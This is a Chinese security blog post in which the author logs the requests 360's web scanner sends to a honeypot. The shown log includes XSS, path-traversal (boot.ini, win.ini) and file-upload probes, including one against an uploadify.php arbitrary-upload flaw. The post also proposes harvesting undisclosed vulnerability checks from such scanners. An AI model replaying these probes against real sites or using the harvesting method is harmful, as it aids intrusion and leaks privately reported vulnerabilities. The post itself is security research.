扫描规则收集新思路

最近发现一种新的收集漏洞扫描规则的思路。

360有一款安全监测工具,360网站安全http://webscan.360.cn/

能检测各类网站安全问题,由此猜测背后肯定是一款扫描器。

那我是不是搭建一个蜜罐程序,让他去监测,然后我将所有日志全部记录下来。这样我就有了和360一样全的扫描规则库了?

以下是测试结果,提交扫描网站后,没多久我的服务器就收到很多请求日志。

GET http://wufeifei.com/  
GET http://wufeifei.com/robots.txt  
GET http://wufeifei.com/  
GET http://wufeifei.com/index.php?a=1<script>alert(abc)<%2Fscript>  
GET http://wufeifei.com/  
GET http://wufeifei.com/nevercouldexistfilenosec  
GET http://wufeifei.com/nevercouldexistfilewebsec  
GET http://wufeifei.com/nevercouldexistfilenosec.aspx  
GET http://wufeifei.com/nevercouldexistfilewebsec.aspx  
GET http://wufeifei.com/nevercouldexistfilenosec.shtml  
GET http://wufeifei.com/nevercouldexistfilewebsec.shtml  
GET http://wufeifei.com/nevercouldexistfilenosec/  
GET http://wufeifei.com/nevercouldexistfilewebsec/  
GET http://wufeifei.com/nevercouldexistfilenosec.zip  
GET http://wufeifei.com/nevercouldexistfilenosec.zip  
GET http://wufeifei.com/nevercouldexistfilewebsec.zip  
GET http://wufeifei.com/nevercouldexistfilenosec.php  
GET http://wufeifei.com/nevercouldexistfilewebsec.php  
GET http://wufeifei.com/nevercouldexistfilenosec.bak  
GET http://wufeifei.com/nevercouldexistfilewebsec.bak  
GET http://wufeifei.com/nevercouldexistfilenosec.rar  
GET http://wufeifei.com/nevercouldexistfilewebsec.rar  
GET http://wufeifei.com/  
PUT http://wufeifei.com/jsky_web_scanner_test_file.txt zwell@nosec.org  
GET http://wufeifei.com/jsky_web_scanner_test_file.txt  
GET http://wufeifei.com/  
GET http://wufeifei.com/wp-admin  
GET http://wufeifei.com/admin.php  
GET http://wufeifei.com/nosec_Web_Scanner_Test.dll  
GET http://wufeifei.com/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini  
GET http://wufeifei.com/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini  
GET http://wufeifei.com/dede/  

等检测完,过滤分析请求日志,统计扫描规则多达数千条。

并且,我从请求日志发现一条惊人的规则:

POST http://wufeifei.com/bocadmin/j/uploadify.php -----------------------------  
Content-Disposition: form-data; name="folder"

/
-----------------------------
Content-Disposition: form-data; name="Filedata"; filename="scan_upload.txt"  
Content-Type: text/plain

This is a txt ,please delete it and scan website again --by webscan  
-----------------------------
Content-Disposition: form-data; name="submit"  

bocadmin/j/uploadify.php , 这条规则是我曾经白盒审计时发现的一个任意文件上传漏洞。影响数十家大型集团、企业官网,当时报给了补天:

影响的企业: 那就是说,补天会将所有的漏洞利用规则添加进360网站安全里面去。

而补天的漏洞是不对第三者公开的,那如果这样的话,就可以利用上面方式收集所有未公开的漏洞检测方法,甚至是漏洞利用方式。并且用同样的方法去收集类似百度安全宝、唐朝安全扫描等等的规则集。